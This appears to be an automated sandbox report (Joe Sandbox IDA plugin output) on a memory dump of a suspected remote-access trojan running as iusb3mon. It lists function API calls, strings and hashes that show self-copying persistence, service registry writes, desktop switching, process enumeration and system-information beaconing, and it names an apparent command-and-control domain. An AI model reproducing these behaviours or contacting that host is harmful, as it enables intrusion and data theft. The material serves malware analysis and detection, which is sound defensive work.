Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpenVersionlstrcatlstrcpy
String ID: PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 209792486-2497808001
Opcode ID: eafde99b7b0a5b6035a56fa6c46cc8c2d1cfb4a4d8a83c182cc83005335faa2d
Instruction ID: 5605d2aad7102ec26e7a4d0f6394e8d9117725f2ab09d5c581c5ea722bf9dda3
Opcode Fuzzy Hash: eafde99b7b0a5b6035a56fa6c46cc8c2d1cfb4a4d8a83c182cc83005335faa2d
Instruction Fuzzy Hash: 8C415C71A00218FFEF219F61DC49EAE7BB9FB49701F100866F901E1290E779BA44DE61

Function 04D771D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Ole32.dll,00000000,?,00006365), ref: 04D771E4
GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 04D771F4
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 04D771FF
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 04D7720A
LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,04D77A46), ref: 04D77214
GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 04D7721F
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04D77A46), ref: 04D772E1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D77A46), ref: 04D772EB

Strings

SysFreeString, xrefs: 04D77216
Ole32.dll, xrefs: 04D771DF
CoCreateInstance, xrefs: 04D77201
Oleaut32.dll, xrefs: 04D7720C
CoInitialize, xrefs: 04D771EE
CoUninitialize, xrefs: 04D771F6
FriendlyName, xrefs: 04D772AA

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
API String ID: 2256533930-3340630095
Opcode ID: 7978ed0e01287418e4e279feb28c7a70c054ae331c2f19c4dfec0508bf1fd4a1
Instruction ID: 34dce6f8a18e73b2d0bb6abbac1f8c3f1e941b650992de630d051578461a3b74
Opcode Fuzzy Hash: 7978ed0e01287418e4e279feb28c7a70c054ae331c2f19c4dfec0508bf1fd4a1
Instruction Fuzzy Hash: 0A411A70A00219BFCB10EBA5CC89DAFBBB9FF85714B104859F515E7250EA71B905CFA0

Function 04D78DF3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 04D78E24
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 04D78E37
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 04D78E42
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 04D78E4D
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04D78E5B
LoadLibraryA.KERNEL32(kernel32.dll), ref: 04D78E65
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04D78E70

Strings

tDesktop, xrefs: 04D78E98
GetThreadDesktop, xrefs: 04D78E2B
CloseDesktop, xrefs: 04D78E55
GetCurrentThreadId, xrefs: 04D78E6A
SetThreadDesktop, xrefs: 04D78E47
user32.dll, xrefs: 04D78E19
kernel32.dll, xrefs: 04D78E60
GetUserObjectInformationA, xrefs: 04D78E3C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
API String ID: 2238633743-1569342589
Opcode ID: 872bd6339a1f212318929d1eff45f89319ef25efa7f10fbf4b0b263717f5d1f1
Instruction ID: cbba61a739378735f3e50d071279184b21e7f720b5e88acc0555a4a7fe6a143e
Opcode Fuzzy Hash: 872bd6339a1f212318929d1eff45f89319ef25efa7f10fbf4b0b263717f5d1f1
Instruction Fuzzy Hash: AF21E971E40218BFDB50AFA5DC49BAEBBB8EB48650F004126F415F2290E7B46E448F60

Function 04D83DFB Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,04D83F34), ref: 04D83E1D
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 04D83E35
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 04D83E46
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 04D83E57
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 04D83E68
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 04D83E79
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 04D83E8A

Strings

GetSystemMetrics, xrefs: 04D83E2F
GetMonitorInfoA, xrefs: 04D83E84
MonitorFromPoint, xrefs: 04D83E62
EnumDisplayMonitors, xrefs: 04D83E73
MonitorFromWindow, xrefs: 04D83E40
MonitorFromRect, xrefs: 04D83E51
USER32, xrefs: 04D83E18

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: e684d8f6339def0ae033978497732338171b61d29d44761eedd09922083a1e70
Instruction ID: baa1aab5c6655564cb58ede477b32073f0c6fabacc94cfa570e857d20c25de3b
Opcode Fuzzy Hash: e684d8f6339def0ae033978497732338171b61d29d44761eedd09922083a1e70
Instruction Fuzzy Hash: 3F113670E01B11ABC7127F35A8E4579BAE4F389B55354053EFC08D6300D77D68A6AF61

Function 04D7789D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 145stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D778C0
lstrlenA.KERNEL32(?,00000000), ref: 04D778E2

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

getsockname.WS2_32(?,?,?), ref: 04D77944
GetVersionExA.KERNEL32(?), ref: 04D77985
GetLastInputInfo.USER32(?), ref: 04D779F3
GetTickCount.KERNEL32 ref: 04D779F9
GlobalMemoryStatusEx.KERNEL32(?), ref: 04D77A1E

Strings

SYSTEM\CurrentControlSet\Services\%s, xrefs: 04D778B3
@, xrefs: 04D77A16
RDP-Tcp, xrefs: 04D77A69
11.26, xrefs: 04D77A52
Console, xrefs: 04D778F8
Groupfenzhu, xrefs: 04D778F3

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CountFreeGlobalInfoInputLastLoadMemoryStatusTickVersiongetsocknamelstrlenwsprintf
String ID: 11.26$@$Console$Groupfenzhu$RDP-Tcp$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1372434316-3814532725
Opcode ID: a0f61ca837d475c6d943a1b7761ece14fc15e09eae294e544774d9b4ff08bfbc
Instruction ID: cd34844e4d816375659c9908cae952fe06e90f0444cede8302827ff57454eea9
Opcode Fuzzy Hash: a0f61ca837d475c6d943a1b7761ece14fc15e09eae294e544774d9b4ff08bfbc
Instruction Fuzzy Hash: AB51EEB2D4021CABEF20EBA4DC49FDE77BCEB44714F404596A509E6141EB74AB84CF61

Function 04D7898B Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 110libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 04D789A5
GetProcAddress.KERNEL32(00000000,closesocket), ref: 04D789B0
wsprintfA.USER32 ref: 04D789E1
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 04D78A3E
GetProcAddress.KERNEL32(00000000,send), ref: 04D78A46
GetLastError.KERNEL32 ref: 04D78A6B
CloseHandle.KERNEL32(00000000), ref: 04D78AAF
Sleep.KERNEL32(00000002), ref: 04D78ABC
FreeLibrary.KERNEL32(00000000), ref: 04D78AD4

Strings

send, xrefs: 04D78A40
closesocket, xrefs: 04D789A7
ws2_32.dll, xrefs: 04D789A0, 04D78A39
ID= %d , xrefs: 04D789DB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
String ID: ID= %d $closesocket$send$ws2_32.dll
API String ID: 872202526-2339802411
Opcode ID: 5167dd988bce9939e229c670c8689181298946eff3f88e2d5062e842679f3b3f
Instruction ID: f5b872c7d24cbcc07702d39c67678dfc0a27e6dd7b054e6b7299c2f92ef4af7f
Opcode Fuzzy Hash: 5167dd988bce9939e229c670c8689181298946eff3f88e2d5062e842679f3b3f
Instruction Fuzzy Hash: 16414531900219EFDB10EFA4D84DAAEBBB9FF04316F10455AF509E6280E774AE44DFA1

Function 04D738D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D73910
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 04D73921
wsprintfA.USER32 ref: 04D7393F
wsprintfA.USER32 ref: 04D73959
GetFileAttributesA.KERNEL32(?), ref: 04D73965
wsprintfA.USER32 ref: 04D73983
Sleep.KERNEL32(00000064), ref: 04D7398A
CopyFileA.KERNEL32(?,?,00000000), ref: 04D7399F
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 04D739AF
CreateDirectoryA.KERNEL32(?,00000000), ref: 04D739BD

Part of subcall function 04D73777: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04D73788
Part of subcall function 04D73777: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04D737B8
Part of subcall function 04D73777: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04D737D1
Part of subcall function 04D73777: GetFileSize.KERNEL32(00000000,00000000), ref: 04D737D9
Part of subcall function 04D73777: _rand.LIBCMT ref: 04D7381A
Part of subcall function 04D73777: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 04D7384F
Part of subcall function 04D73777: CloseHandle.KERNEL32(?), ref: 04D73860

SetFileAttributesA.KERNEL32(?,00000000), ref: 04D739DF

Strings

%s\%s, xrefs: 04D73944, 04D73957, 04D73981
%s.exe, xrefs: 04D73939

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWrite_rand
String ID: %s.exe$%s\%s
API String ID: 832629782-3574828809
Opcode ID: 4de57da5ad2212f6b1818a5dd510651999dc2bd904e67bad79c6ca7822604777
Instruction ID: fbf3e0dd4bcae5230de5f9b2933f8fe6824d5d2b0d55adf45cd60fa1479b458a
Opcode Fuzzy Hash: 4de57da5ad2212f6b1818a5dd510651999dc2bd904e67bad79c6ca7822604777
Instruction Fuzzy Hash: 1F312FB291012CABDB109BE0DC88EEB77BCEB45319F040596F609E6150E678EE84CF60

Function 04D75643 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D75660
strlen.MSVCRT ref: 04D75685

Part of subcall function 04D79423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,04D9CB7A,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001,04D9CB7A), ref: 04D79450
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 04D79467
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 04D79472
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 04D7947D
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 04D79488
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04D79493
Part of subcall function 04D79423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04D7949E
Part of subcall function 04D79423: FreeLibrary.KERNEL32(00000000,?,00000000,04D7ADE0,04D8E538,000000FF,?,04D756BE,80000001,Console,Groupfenzhu,00000001), ref: 04D79592

strlen.MSVCRT ref: 04D756A7
GetLocalTime.KERNEL32(?), ref: 04D756C5
wsprintfA.USER32 ref: 04D756ED
strlen.MSVCRT ref: 04D756FC

Strings

SYSTEM\CurrentControlSet\Services\%s, xrefs: 04D7565A
InstallTime, xrefs: 04D7570A
Remarkbeizhu, xrefs: 04D75690
Console, xrefs: 04D75674, 04D75695, 04D756B7, 04D7570F
Groupfenzhu, xrefs: 04D756B2
huazai168.com, xrefs: 04D7564E
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 04D756E7

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
String ID: %4d-%.2d-%.2d %.2d:%.2d$Console$Groupfenzhu$InstallTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\%s$huazai168.com
API String ID: 124699875-2856019323
Opcode ID: 0446a7b09e3b91e1cb6dcb24d71a84e6fca0d74b1f8531504946402b68f35aa4
Instruction ID: 1d4137e430aefa85b514f8177e0a7721a2c8f40569b632fe5902c4cab8e190ea
Opcode Fuzzy Hash: 0446a7b09e3b91e1cb6dcb24d71a84e6fca0d74b1f8531504946402b68f35aa4
Instruction Fuzzy Hash: C42175B2A50214BBEB10ABA4DC4AFFF76FDEB04B05F040445BA05E2181E6B9AD548774

Function 04D712D2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D712D7
WSAStartup.WS2_32(00000202,?), ref: 04D71328
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04D71333

Strings

k, xrefs: 04D71359
y, xrefs: 04D7135D
g, xrefs: 04D7134D
q, xrefs: 04D71361
, xrefs: 04D7136D
x, xrefs: 04D71369
m, xrefs: 04D71355
8, xrefs: 04D71351
h, xrefs: 04D71365

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CreateEventH_prologStartup
String ID: $8$g$h$k$m$q$x$y
API String ID: 2400729181-2346024814
Opcode ID: 8f9f5dc1e496555eb076222368920786a9865537022504b019c53f02181af5f9
Instruction ID: 8a45c9455c91d2e0a60d5d92cf7a07486063ce549de10875a720ffa6538f71e7
Opcode Fuzzy Hash: 8f9f5dc1e496555eb076222368920786a9865537022504b019c53f02181af5f9
Instruction Fuzzy Hash: 5B21A471A04395DEF711DBA8C5497EFBFF8AF11348F44055D9482A2282DBB56608CBB2

Function 04D790D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?), ref: 04D790E1
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 04D790F5
GetProcAddress.KERNEL32(00000000,Process32First), ref: 04D790FF
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 04D7910A
lstrcmpiA.KERNEL32(?,?), ref: 04D79142
CloseHandle.KERNEL32(00000000,?,?), ref: 04D79161
FreeLibrary.KERNEL32(00000000,?,?), ref: 04D7916C

Strings

CreateToolhelp32Snapshot, xrefs: 04D790EF
Process32Next, xrefs: 04D79101
Process32First, xrefs: 04D790F7
kernel32.dll, xrefs: 04D790DC

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
API String ID: 1314729832-4285911020
Opcode ID: f84868d4876e1e24f94adcd9a9f9a26f6ded7c3586120526e58682d433a47f84
Instruction ID: cd0ff9537365d9cfefe7579714eb65a3808637dec9030e09d2ab3a9f79f57e66
Opcode Fuzzy Hash: f84868d4876e1e24f94adcd9a9f9a26f6ded7c3586120526e58682d433a47f84
Instruction Fuzzy Hash: 37115471A01218BBEB119B618C4DFEEBBFCEF45750F000095B904E2240E7B4AE04CE51

Function 04D73FC8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 178stringprocessCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D740AA
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 04D7410F
lstrcatA.KERNEL32(?,04D97D6C), ref: 04D74155
lstrcatA.KERNEL32(?,04D742C0), ref: 04D74161
lstrcpyA.KERNEL32(00000000,04D742C0), ref: 04D74169
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04D741AF

Strings

D, xrefs: 04D7417C
WinSta0\Default, xrefs: 04D74185
"%1, xrefs: 04D7411B
%s\shell\open\command, xrefs: 04D740A4

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateEnvironmentExpandProcessStringslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 2973130283-33419044
Opcode ID: 82785b7864cf55eb62ab5a185234cd3e19104c191bc0cf02dbbb991f561e8df8
Instruction ID: bdfbcede5df408546b9145daf91adeb9423a5d991dd2c665cf70442c14ffbd5f
Opcode Fuzzy Hash: 82785b7864cf55eb62ab5a185234cd3e19104c191bc0cf02dbbb991f561e8df8
Instruction Fuzzy Hash: DF5156B2A0021CFEEF119AE4DC85EEF77BCEB45355F0004A6F605E6140FA75AA858F61

Function 00575880 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,005720C5,005720C7,00000000,00000000,110D3D80,?,00000000,?,00578D60,00599FF8,000000FE,?,005720C5,?), ref: 00575909
MultiByteToWideChar.KERNEL32(00000000,00000000,005720C5,?,00000000,00000000,?,00578D60,00599FF8,000000FE,?,005720C5), ref: 00575984
SysAllocString.OLEAUT32(00000000), ref: 0057598F
_com_issue_error.COMSUPP ref: 005759B8
_com_issue_error.COMSUPP ref: 005759C2
GetLastError.KERNEL32(80070057,110D3D80,?,00000000,?,00578D60,00599FF8,000000FE,?,005720C5,?), ref: 005759C7
_com_issue_error.COMSUPP ref: 005759DA
GetLastError.KERNEL32(00000000,?,00578D60,00599FF8,000000FE,?,005720C5,?), ref: 005759F0
_com_issue_error.COMSUPP ref: 00575A03

Strings

ZW, xrefs: 00575A19

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID: ZW
API String ID: 1353541977-1365959957
Opcode ID: bf68bbd4175c3b473f97dfd73cf951708670e1ca3bd7b2a4037c25dedd9446d8
